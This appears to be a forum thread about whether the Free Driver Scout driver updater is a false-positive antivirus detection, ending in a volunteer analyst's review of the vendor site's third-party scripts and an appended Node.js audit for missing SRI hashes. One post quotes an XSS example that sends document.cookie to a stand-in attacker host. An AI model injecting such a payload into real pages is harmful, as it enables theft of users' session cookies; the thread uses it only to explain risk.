Free Driver Scout false positive?

http://freedriverscout.com

Getting detected as Win32:Adware-gen [Adw]. Even without PUP enabled. Is this correct?

My F-Secure blocked the download

Turning off F-Secure, then it is blocked by Chrome

VirusTotal
https://virustotal.com/nb/file/a542d8babd64ee70630ddd154f97f539d275a022346f568411539f60338fd74e/analysis/1464212529/

Metadefender >> https://www.metadefender.com/#!/results/file/21edaec0bbe74c95bd1b72ec326a4a39/regular

Jotti >> https://virusscan.jotti.org/en-US/filescanjob/7bnosilign

It was highly praised by PC Support webpage: http://pcsupport.about.com/od/driversites/tp/free-driver-updater-tools.htm

I tried Driver Booster and I quite like it. Now I’ve wanted to try this one and it was stopped by avast!..

The real question is if you need such a tool.

Is there a need to have the latest drivers installed?
Normally not, but there are exceptions of course.
e.g.
If the new ones fix a security flaw. (for instance if you use a printer through wifi)
If the new ones fix a bug that is making your hardware not work properly.

And why use a 3rd party tool for it?
They don’t have a database for the millions of different hardware that exist.
Manufacturers websites have the newest drivers before those tools have them listed.

It matters not if you need such a thing, only that you want to use/try it and it is being blocked.

Detection has been changed to PUP.

It is when you have to reinstall a device like a Windows tablet and you don’t have the slightest clue what all those weird PCI controllers are and there is no centralized driver download like for regular motherboards. But with tools like this, everything gets detected and installed properly. Without these tools I’d never get it working properly.

EDIT:
It’s still being detected exactly the same as before. Where was it moved to PUP detection? Looks the same for me…

For issues like this I’d suggest
https://sdi-tool.org/
Yes, it’s big, but it does its job very well (used it myself many times).

I just stick with IObit’s Driver Booster. It gets the job done.

So, what is with this file? Is it a false positive or a genuine detection?

It is a PUP. A genuine detection for sure.

Hi RejZoR,

When you see what is running at that site: http://retire.insecurity.today/#!/scan/60fc1c974bfdf490c2c49eb8c19231fceeae8d410bc8adf5544c38ac780280e3
and you know what to block and intend to willingly download the potentially unwanted software,
because you are fully aware of any risks involved, then there is no risk downloading the tool.
Nothing to hold you back.

Script blockers block some of the third party code running on that website like: -http://dmp.theadex.com/d/105/21/s/adex.js
and -http://beacon-4.newrelic.com/1/26cb0a7878? and -http://js-agent.newrelic.com/nr-100.js
Well, a developer of free tools has to make an income of sorts somewhere, so tracking scripts galore on such a page,
resulting in that PUP alert.

Just see where this lands for instance: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fjs-agent.newrelic.com%2Fnr-100.js

The code error next to the XSS sources and sinks:

 detected] script
     info: [decodingLevel=0] found JavaScript
     error: line:3: SyntaxError: missing ; before statement:
          error: line:3: ar NR_QUEUE=[];"undefined"!=typeof window.NREUMQ?NR_QUEUE=NREUMQ:"undefined"!=typeof window.EPISODES?NR_QUEUE=EPISODES.q:"undefined"!=typeof window.NREUM&&(NR_QUEUE=NREUM.q);var NREUM=NREUM||{};NREUM.q=NR_QUEUE,NREUM.targetOrigin=document.location.protoco
          error: line:3: ^

New Relic Google Episodes code that comes shared on the webs. Exceptions should be mitigated by re-copying for errors.

So whenever you use free tools today you pay with some of your privacy and meta-data, it always comes at a price that you should be willing to pay or you should block what should be blocked at such a page.

Non-persistent cross-site-scripting attacks are possible here, depending on where code has access,
and could be performed via an attack like for instance

<SCRIPT>
document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>

.
Just to give an example for document.location.protoco → document.location.href)+“&p=”+NREUM.sHash(document.referrer)
and indeed there is room for insecurity for scripts running on the site, see: https://sritest.io/#report/0cddf512-ac4d-4005-b3da-5be611dfeb93

See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fcdn.optimizely.com%2Fjs%2F507870057.js SRI hash missing
and Results from scanning URL: http://cdn.optimizely.com/js/507870057.js
Number of sources found: 103
Number of sinks found: 42

Could be a good idea to profoundly security test all the code on that website,
but i.m.h.o. there are no immediate malware threats, neither from the site nor from that tool,
better security could be implemented though, just be aware of the complicated code chain error consequences.
All works through on the general website’s security infrastructure.

Have a nice day,

polonus (volunteer website security analyst and website error-hunter)
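
Added example, not part of the thread and not code from any poster: a small Node.js audit of the "SRI hash missing" point raised in the last post, listing third-party `<script>` tags that lack an `integrity` attribute or load over plain HTTP. The sample markup is constructed (only the two script URLs come from the post), `cdn.example.test` is a placeholder host, and the function names are made up for this sketch.

```javascript
// Added example: audit a page's <script> tags for Subresource Integrity (SRI).
const nodeCrypto = require('node:crypto');

// Build an SRI value ("sha384-<base64 digest>") for a script body.
function sriHash(body, algo = 'sha384') {
  return `${algo}-${nodeCrypto.createHash(algo).update(body).digest('base64')}`;
}

// True when the body matches any listed hash. Simplification: browsers only
// compare against the strongest algorithm present in the attribute.
function matchesIntegrity(body, integrity) {
  return integrity.trim().split(/\s+/).some((token) => {
    const algo = token.split('-', 1)[0];
    return ['sha256', 'sha384', 'sha512'].includes(algo) && sriHash(body, algo) === token;
  });
}

// List third-party scripts and flag missing SRI or plain-HTTP loading.
function auditScripts(html, pageUrl) {
  const pageHost = new URL(pageUrl).hostname;
  const findings = [];
  for (const [, attrs] of html.matchAll(/<script\b([^>]*)>/gi)) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (!src) continue; // inline script: SRI does not apply
    const url = new URL(src[1], pageUrl);
    if (url.hostname === pageHost) continue; // first-party script
    findings.push({
      src: url.href,
      missingSri: !/\bintegrity\s*=\s*["'][^"']+["']/i.test(attrs),
      insecureTransport: url.protocol !== 'https:',
    });
  }
  return findings;
}

// Constructed sample markup; the two http:// script URLs are named in the post.
const SAMPLE_HTML = `
<script src="/js/site.js"></script>
<script src="http://dmp.theadex.com/d/105/21/s/adex.js"></script>
<script src="http://js-agent.newrelic.com/nr-100.js"></script>
<script src="https://cdn.example.test/lib.js" integrity="${sriHash('var a=1;')}" crossorigin="anonymous"></script>
<script>var inline = true;</script>`;

console.log(auditScripts(SAMPLE_HTML, 'http://freedriverscout.com/'));
```

A script served over plain HTTP can be altered in transit, and a third-party script without an `integrity` value runs whatever the remote host serves at load time; both flags point at the same trust gap.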